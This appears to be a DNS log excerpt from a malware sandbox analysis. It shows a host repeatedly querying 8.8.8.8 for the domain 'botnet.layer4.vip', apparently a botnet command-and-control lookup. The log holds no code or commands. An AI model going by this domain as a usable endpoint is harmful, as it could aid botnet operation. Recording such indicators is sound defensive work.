                                  Apr 9, 2023 03:30:54.808547974 CEST192.168.2.238.8.8.80x7753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.833956957 CEST192.168.2.238.8.8.80x7753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.850332975 CEST192.168.2.238.8.8.80x7753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.867008924 CEST192.168.2.238.8.8.80x7753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.892899990 CEST192.168.2.238.8.8.80x6e1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.917577982 CEST192.168.2.238.8.8.80x6e1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.933213949 CEST192.168.2.238.8.8.80x6e1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.959043980 CEST192.168.2.238.8.8.80x6e1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.983810902 CEST192.168.2.238.8.8.80x6e1eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.999703884 CEST192.168.2.238.8.8.80xd999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.024182081 CEST192.168.2.238.8.8.80xd999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.040189981 CEST192.168.2.238.8.8.80xd999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.055577040 CEST192.168.2.238.8.8.80xd999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.071613073 CEST192.168.2.238.8.8.80xd999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.087152004 CEST192.168.2.238.8.8.80xf624Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.111154079 CEST192.168.2.238.8.8.80xf624Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.135479927 CEST192.168.2.238.8.8.80xf624Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.159945011 CEST192.168.2.238.8.8.80xf624Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.184245110 CEST192.168.2.238.8.8.80xf624Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.208820105 CEST192.168.2.238.8.8.80xf775Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.224335909 CEST192.168.2.238.8.8.80xf775Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.248588085 CEST192.168.2.238.8.8.80xf775Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.264049053 CEST192.168.2.238.8.8.80xf775Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.279797077 CEST192.168.2.238.8.8.80xf775Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.304286957 CEST192.168.2.238.8.8.80x948Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.320050001 CEST192.168.2.238.8.8.80x948Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.344072104 CEST192.168.2.238.8.8.80x948Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.359896898 CEST192.168.2.238.8.8.80x948Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.375735044 CEST192.168.2.238.8.8.80x948Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.399822950 CEST192.168.2.238.8.8.80x2ec2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.415668011 CEST192.168.2.238.8.8.80x2ec2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.431214094 CEST192.168.2.238.8.8.80x2ec2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.447170019 CEST192.168.2.238.8.8.80x2ec2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.471338034 CEST192.168.2.238.8.8.80x2ec2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.495608091 CEST192.168.2.238.8.8.80x1adcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.511528015 CEST192.168.2.238.8.8.80x1adcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.527082920 CEST192.168.2.238.8.8.80x1adcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.542773962 CEST192.168.2.238.8.8.80x1adcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.566979885 CEST192.168.2.238.8.8.80x1adcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.591295004 CEST192.168.2.238.8.8.80x35f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.615484953 CEST192.168.2.238.8.8.80x35f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.639631033 CEST192.168.2.238.8.8.80x35f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.655579090 CEST192.168.2.238.8.8.80x35f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.671331882 CEST192.168.2.238.8.8.80x35f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.696027994 CEST192.168.2.238.8.8.80x4311Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.720683098 CEST192.168.2.238.8.8.80x4311Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.736715078 CEST192.168.2.238.8.8.80x4311Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.752805948 CEST192.168.2.238.8.8.80x4311Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.777358055 CEST192.168.2.238.8.8.80x4311Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.801929951 CEST192.168.2.238.8.8.80x3f5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.826527119 CEST192.168.2.238.8.8.80x3f5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.842099905 CEST192.168.2.238.8.8.80x3f5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.866760969 CEST192.168.2.238.8.8.80x3f5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.882750034 CEST192.168.2.238.8.8.80x3f5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.907097101 CEST192.168.2.238.8.8.80x430dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.923029900 CEST192.168.2.238.8.8.80x430dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.938684940 CEST192.168.2.238.8.8.80x430dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.963088036 CEST192.168.2.238.8.8.80x430dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:55.979001999 CEST192.168.2.238.8.8.80x430dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.003603935 CEST192.168.2.238.8.8.80x5338Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.019552946 CEST192.168.2.238.8.8.80x5338Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.035371065 CEST192.168.2.238.8.8.80x5338Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.059870005 CEST192.168.2.238.8.8.80x5338Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.084290028 CEST192.168.2.238.8.8.80x5338Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.100074053 CEST192.168.2.238.8.8.80xadfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.124109030 CEST192.168.2.238.8.8.80xadfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.148416996 CEST192.168.2.238.8.8.80xadfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.164238930 CEST192.168.2.238.8.8.80xadfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.188513041 CEST192.168.2.238.8.8.80xadfbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.204312086 CEST192.168.2.238.8.8.80x82d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.220109940 CEST192.168.2.238.8.8.80x82d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.244317055 CEST192.168.2.238.8.8.80x82d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.260200024 CEST192.168.2.238.8.8.80x82d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.278167963 CEST192.168.2.238.8.8.80x82d6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.303446054 CEST192.168.2.238.8.8.80x787dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.319442987 CEST192.168.2.238.8.8.80x787dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.343637943 CEST192.168.2.238.8.8.80x787dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.359477043 CEST192.168.2.238.8.8.80x787dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.375086069 CEST192.168.2.238.8.8.80x787dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.399234056 CEST192.168.2.238.8.8.80x50e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.423513889 CEST192.168.2.238.8.8.80x50e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.439378023 CEST192.168.2.238.8.8.80x50e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.454924107 CEST192.168.2.238.8.8.80x50e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.479317904 CEST192.168.2.238.8.8.80x50e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.494965076 CEST192.168.2.238.8.8.80xd5deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.519499063 CEST192.168.2.238.8.8.80xd5deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.543951035 CEST192.168.2.238.8.8.80xd5deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.568252087 CEST192.168.2.238.8.8.80xd5deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.584345102 CEST192.168.2.238.8.8.80xd5deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.608894110 CEST192.168.2.238.8.8.80xf07eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.633644104 CEST192.168.2.238.8.8.80xf07eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.657912970 CEST192.168.2.238.8.8.80xf07eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.682605028 CEST192.168.2.238.8.8.80xf07eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.707504034 CEST192.168.2.238.8.8.80xf07eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.732091904 CEST192.168.2.238.8.8.80xc8bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.756630898 CEST192.168.2.238.8.8.80xc8bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.772919893 CEST192.168.2.238.8.8.80xc8bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.788831949 CEST192.168.2.238.8.8.80xc8bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.804702044 CEST192.168.2.238.8.8.80xc8bbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.820699930 CEST192.168.2.238.8.8.80x1ce7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.845135927 CEST192.168.2.238.8.8.80x1ce7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.869550943 CEST192.168.2.238.8.8.80x1ce7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.885857105 CEST192.168.2.238.8.8.80x1ce7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.901686907 CEST192.168.2.238.8.8.80x1ce7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.926291943 CEST192.168.2.238.8.8.80xb590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.942145109 CEST192.168.2.238.8.8.80xb590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.966866016 CEST192.168.2.238.8.8.80xb590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.982825994 CEST192.168.2.238.8.8.80xb590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:56.998507023 CEST192.168.2.238.8.8.80xb590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.014782906 CEST192.168.2.238.8.8.80xa633Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.039145947 CEST192.168.2.238.8.8.80xa633Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.054949045 CEST192.168.2.238.8.8.80xa633Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.070789099 CEST192.168.2.238.8.8.80xa633Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.095408916 CEST192.168.2.238.8.8.80xa633Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.119671106 CEST192.168.2.238.8.8.80x3610Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.135287046 CEST192.168.2.238.8.8.80x3610Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.151000023 CEST192.168.2.238.8.8.80x3610Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.175195932 CEST192.168.2.238.8.8.80x3610Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.199428082 CEST192.168.2.238.8.8.80x3610Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.215527058 CEST192.168.2.238.8.8.80xc32bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.231605053 CEST192.168.2.238.8.8.80xc32bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.247278929 CEST192.168.2.238.8.8.80xc32bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.271714926 CEST192.168.2.238.8.8.80xc32bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.296144009 CEST192.168.2.238.8.8.80xc32bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.312272072 CEST192.168.2.238.8.8.80x1883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.328186989 CEST192.168.2.238.8.8.80x1883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.343787909 CEST192.168.2.238.8.8.80x1883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.359301090 CEST192.168.2.238.8.8.80x1883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.374969006 CEST192.168.2.238.8.8.80x1883Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.399557114 CEST192.168.2.238.8.8.80xac88Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.415592909 CEST192.168.2.238.8.8.80xac88Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.431615114 CEST192.168.2.238.8.8.80xac88Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.456402063 CEST192.168.2.238.8.8.80xac88Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.471997976 CEST192.168.2.238.8.8.80xac88Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.488049030 CEST192.168.2.238.8.8.80xd8b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.503964901 CEST192.168.2.238.8.8.80xd8b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.528729916 CEST192.168.2.238.8.8.80xd8b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.553025961 CEST192.168.2.238.8.8.80xd8b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.568756104 CEST192.168.2.238.8.8.80xd8b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.593394995 CEST192.168.2.238.8.8.80xc94bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.617544889 CEST192.168.2.238.8.8.80xc94bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.641822100 CEST192.168.2.238.8.8.80xc94bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.657743931 CEST192.168.2.238.8.8.80xc94bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.682136059 CEST192.168.2.238.8.8.80xc94bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.706916094 CEST192.168.2.238.8.8.80xa670Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.722822905 CEST192.168.2.238.8.8.80xa670Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.738775969 CEST192.168.2.238.8.8.80xa670Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.754776001 CEST192.168.2.238.8.8.80xa670Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.778990984 CEST192.168.2.238.8.8.80xa670Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.794847012 CEST192.168.2.238.8.8.80x6003Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.819529057 CEST192.168.2.238.8.8.80x6003Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.843811035 CEST192.168.2.238.8.8.80x6003Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.859461069 CEST192.168.2.238.8.8.80x6003Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.883774042 CEST192.168.2.238.8.8.80x6003Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.908499002 CEST192.168.2.238.8.8.80xcd2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.932734013 CEST192.168.2.238.8.8.80xcd2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.948188066 CEST192.168.2.238.8.8.80xcd2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.972724915 CEST192.168.2.238.8.8.80xcd2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:57.997241974 CEST192.168.2.238.8.8.80xcd2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.021866083 CEST192.168.2.238.8.8.80x799eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.046384096 CEST192.168.2.238.8.8.80x799eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.070979118 CEST192.168.2.238.8.8.80x799eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.095397949 CEST192.168.2.238.8.8.80x799eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.110837936 CEST192.168.2.238.8.8.80x799eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.134812117 CEST192.168.2.238.8.8.80xc3c8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.150451899 CEST192.168.2.238.8.8.80xc3c8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.165924072 CEST192.168.2.238.8.8.80xc3c8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.181754112 CEST192.168.2.238.8.8.80xc3c8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.197283983 CEST192.168.2.238.8.8.80xc3c8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.221837044 CEST192.168.2.238.8.8.80x5d95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.246278048 CEST192.168.2.238.8.8.80x5d95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.262061119 CEST192.168.2.238.8.8.80x5d95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.286588907 CEST192.168.2.238.8.8.80x5d95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.310619116 CEST192.168.2.238.8.8.80x5d95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.334855080 CEST192.168.2.238.8.8.80x5be4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.359452009 CEST192.168.2.238.8.8.80x5be4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.383624077 CEST192.168.2.238.8.8.80x5be4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.408180952 CEST192.168.2.238.8.8.80x5be4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.423857927 CEST192.168.2.238.8.8.80x5be4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.448143005 CEST192.168.2.238.8.8.80x5e7cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.464051962 CEST192.168.2.238.8.8.80x5e7cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.488589048 CEST192.168.2.238.8.8.80x5e7cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.512752056 CEST192.168.2.238.8.8.80x5e7cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.528606892 CEST192.168.2.238.8.8.80x5e7cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.544562101 CEST192.168.2.238.8.8.80xd5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.568770885 CEST192.168.2.238.8.8.80xd5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.584749937 CEST192.168.2.238.8.8.80xd5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.609000921 CEST192.168.2.238.8.8.80xd5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.624635935 CEST192.168.2.238.8.8.80xd5efStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.640563965 CEST192.168.2.238.8.8.80xd590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.656445980 CEST192.168.2.238.8.8.80xd590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.680691957 CEST192.168.2.238.8.8.80xd590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.696774006 CEST192.168.2.238.8.8.80xd590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.712717056 CEST192.168.2.238.8.8.80xd590Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.737032890 CEST192.168.2.238.8.8.80x838Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.752932072 CEST192.168.2.238.8.8.80x838Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.768701077 CEST192.168.2.238.8.8.80x838Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:58.784677982 CEST192.168.2.238.8.8.80x838Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
